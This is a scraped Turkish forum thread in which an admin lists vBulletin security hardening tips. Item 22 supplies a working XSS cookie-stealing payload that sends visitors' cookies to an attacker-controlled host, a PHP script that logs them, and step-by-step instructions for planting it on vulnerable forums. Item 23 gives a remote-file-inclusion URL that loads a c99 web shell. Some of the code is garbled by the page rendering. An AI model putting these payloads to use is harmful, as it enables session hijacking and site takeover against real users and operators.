ilkvahiy.net   ilkvahiy.net'i Tavsiye Edin ilkvahiy.net Türkçe ilkvahiy.net in English

Geri git   ilkvahiy.net > ALIŞVERİŞ - BİLGİSAYAR - TEKNOLOJİ - İNTERNET - GRAFİK TASARIM - WEBMASTER BÖLÜMÜ > Web Tasarım > vBulletin
Şifremi Unuttum Kayıt Ol

Ücretsiz Kayıt Ol
İslami Sorular ve Cevapları | Namaz | Kurban | Evlilik | İlahiler | Üniversitelerimiz | Protestolarımız
Filistin Hakkında | İllerimizin Neleri Meşhur ?
Sitemiz Hakkında Sıkça Sorulan Sorular ve Cevapları

Filistine Dua Zincirine Katıl...
Filistin'e Destek Facebook Grubu

Haydi Sen de Ücretsiz Blogunu Oluşturmaya Başla. Nette Senin de Yerin Bulunsun !
vBulletin vBulletin Hakkındaki Paylaşımlarınız

ilkvahiy.net 7 GB Ücretsiz E-Posta Alanı Veriyor. Sen de İstemez misin ?

ilkvahiy.net'e Neden Kayıt Olmalıyım ? - ilkvahiy.net Radyo - Bayan Bölümüne Giriş - Erkek Bölümüne Giriş - Namaz Vakitleri - Dost TV
Sayfayı E-Posta Olarak Gönder Sayfayı E-Posta Olarak Gönder Facebookta Arkadaşlarınla Paylaş
Yazdırılabilir Şekli Göster Konuyu Yazdır
Cevapla
 
LinkBack Konu Araçları Görünüm Biçimi
  #1 (permalink)  
Alt 28-12-2007, 20:43
admin - ait Kullanici Resmi (Avatar)
Genel Admin
 
Üyelik tarihi: Sep 2007
Yaş: 23
Mesajlar: 7,259
Memleket :
Cinsiyet :
Blog Kayıtları: 68
Teşekkür: 100
340 mesajı 972 Teşekkür Aldı
Ülke Bayrağı - turkey!
Tecrübe Puanı Gücü: 100
admin has much to be proud ofadmin has much to be proud ofadmin has much to be proud ofadmin has much to be proud ofadmin has much to be proud ofadmin has much to be proud ofadmin has much to be proud ofadmin has much to be proud ofadmin has much to be proud of
Standart vBulletin Güvenlik Açıkları ve Kapama Yolları


vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı

--------------------------------------------------------------------------------

  1. İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
  2. Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
  3. Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
  4. Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
  5. Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
  6. Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
  7. Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
  8. Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
  9. Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
  10. Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
  11. Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
  12. Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
  13. Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.
  14. imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
  15. Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
  16. Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
  17. Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
  18. Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
  19. Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iken kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
  20. eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir. Örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
  21. Eğer toplistinizi eklenti olarak kullanıyosanız html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
  22. Gelelim eklentiden doğan xss açığına Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.



    PHP- Kodu:
     d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
    document.********.href="https://www.google.com/adsense/testmagic.pdf"
    </script> 
    Aşağıdakini de c.php olarak kaydedip bir host a atın.


    PHP- Kodu:
     <?php 
    $cookie 
    $_GET['c']; 
    $ip getenv ('REMOTE_ADDR'); 
    $date=date("m/d/Y g:i:s a"); 
    $referergetenv ('HTTP_REFERER'); 
    $fl fopen('megalog.txt''a'); 
    fwrite($fl"\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
    fclose($fl); 
    ?>
    Nasıl kullanılacağına geçelim :

    vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

    Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

    işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.
  23. Diğer vbulletin toplist açığıda şöyle
    PHP- Kodu:
    [url="http://www.hedefsite.com/toplist/sources/join.php?FORM"]http://www.hedefsite.com/toplist/sources/join.php?FORMhttp://=owned&CONFIG[captcha]=1&...rk.org/c99.txt? 
    bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki
    PHP- Kodu:
    FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path
    kodunu silmeniz gerekmektedir.
__________________
"Bir Kavmin Seyyidi O Kavme Hizmet Edendir" (Hadis-i Şerif) - Güzel Bir Yazı - Tıkla Destek Ol
Facebookta Bana Ulaşmak İsterseniz Adım : Ilk Vahiy
(Arkadaşlıkları Kabul Ediyorum. Site ile ilgili sorularınıza da mümkün mertebe hızlı cevap vermeye çalışıyorum.)

Konu admin tarafindan (10-03-2008 Saat 00:10 ) degistirilmistir.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Share on FacebookStumble this Post!Google Bookmark this Post!Diigo this Post!Yahoo Bookmark this Post!Live Bookmark this Post!Blink this Post!Propeller this post!Bookmark to AskJeeves!Bookmark to Ma.gnolia!Bookmark to Feed Me Links!Bookmark to Newsvine!Bookmark to Slashdot!Bookmark to Lycos IQ!
Alinti ile Cevapla
Sponsor Bağlantılar

1000 GB (1 TB), 7200 RPM, 32 MB Cache, SATA 2 HDD 207,59 YTL+ KDV Tıklayın
Cevapla

Bookmarks


Şu Anda Konuyu Görüntüleyen Aktif Kullanıcılar : 1 (0 Üye ve 1 Misafir)
 
Konu Araçları
Görünüm Biçimi

Yetkileriniz
Yeni Konu Açamazsınız
Mesajlara Cevap Yazamazsınız
Mesajınıza Eklenti Ekleyemezsiniz
Mesajlarınızı Düzenleyemezsiniz

BB code is Açık
Smileler Açık
[IMG] Kodlari Açık
HTML-KodlariKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Gitmek istediginiz klasörü seciniz

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar son Mesaj
Güvenlik Açıkları ve Şifreleme designera Güvenlik 1 11-05-2008 18:20
Vbulletin Optimizasyonu admin vBulletin 0 31-01-2008 14:11


Site Saati (GMT +2): 07:43


Sitemiz vBulletin Version 3.8.0 Kullanmaktadır.
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0
Copyright © 2007 - 2009 ilkvahiy.net

Sitemizde Yazılan Yazılardan ilkvahiy.net Ekibi Sorumlu Değildir. Herkes Kendi Yazdıklarından Sorumludur.
Bu Site Bir Flört Sitesi Değildir !!! Erkek-Bayan İlişkilerinde Hududu Aşanlar Direk Olarak Siteden Atılır.
Sitemizde Crack,Warez,Serial,Keygen vs. gibi tüm yasadışı içerikleri paylaşmak yasaktır.
Reklam, Flood, Spam, Argo, Küfür Siteden Atılma Sebepleridir.

Gizlilik ve Güvenlik | Hakkımızda | Logolarımız | Bizimle Çalışmak İster misiniz ? | Link Değişim
ilkvahiy.net'e Reklam Ver | Şikayetlerinizi Bildirin | Sitemizden Atılma Sebepleri

Erkek Bölümüne Giriş Hakkında Bilgi | Bayan Bölümüne Giriş Hakkında Bilgi